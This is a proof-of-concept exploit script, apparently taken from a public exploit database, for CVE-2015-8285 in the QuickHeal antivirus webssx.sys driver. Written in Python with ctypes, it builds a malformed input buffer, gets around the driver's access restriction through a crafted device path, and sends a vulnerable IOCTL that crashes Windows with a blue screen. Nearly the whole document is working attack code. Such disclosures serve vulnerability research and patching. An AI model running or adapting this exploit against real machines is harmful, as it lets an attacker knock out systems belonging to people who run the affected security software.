# Exploit Title: QuickHeal webssx.sys driver DOS vulnerability
# Date: 19/02/2016
# Exploit Author: Csaba Fitzl
# Vendor Homepage: http://www.quickheal.co.in/
# Version: 16.00
# Tested on: Win7x86, Win7x64
# CVE : CVE-2015-8285
from ctypes import *
from ctypes.wintypes import *
import sys
kernel32 = windll.kernel32
ntdll = windll.ntdll
#GLOBAL VARIABLES
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0
def alloc_in(base,evil_size):
""" Allocate input buffer """
print "[*] Allocating input buffer"
baseadd = c_int(base)
size = c_int(evil_size)
evil_input = "\x41" * 0x10
evil_input += "\x42\x01\x42\x42" #to trigger memcpy
evil_input += "\x42" * (0x130-0x14)
evil_input += "\xc0\xff\xff\xff" #this will cause memcpy to fail, and trigger BSOD
evil_input += "\x43" * (evil_size-len(evil_input))
ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,
POINTER(c_int), c_int, c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0,
byref(size),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "[-] Error while allocating memory: %s" % hex(dwStatus+0xffffffff)
sys.exit()
written = c_ulong()
alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base, evil_input, len(evil_input), byref(written))
if alloc == 0:
print "[-] Error while writing our input buffer memory: %s" %\
alloc
sys.exit()
if __name__ == '__main__':
print "[*] webssx BSOD"
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
IOCTL_VULN = 0x830020FC
DEVICE_NAME = "\\\\.\\webssx\some" #add "some" to bypass ACL restriction, (FILE_DEVICE_SECURE_OPEN is not applied to the driver)
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
inputbuffer = 0x41414141 #memory address of the input buffer
inputbuffer_size = 0x1000
outputbuffer_size = 0x0
outputbuffer = 0x20000000
alloc_in(inputbuffer,inputbuffer_size)
IoStatusBlock = c_ulong()
if driver_handle:
print "[*] Talking to the driver sending vulnerable IOCTL..."
dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
None,
None,
None,
byref(IoStatusBlock),
IOCTL_VULN,
inputbuffer,
inputbuffer_size,
outputbuffer,
outputbuffer_size
)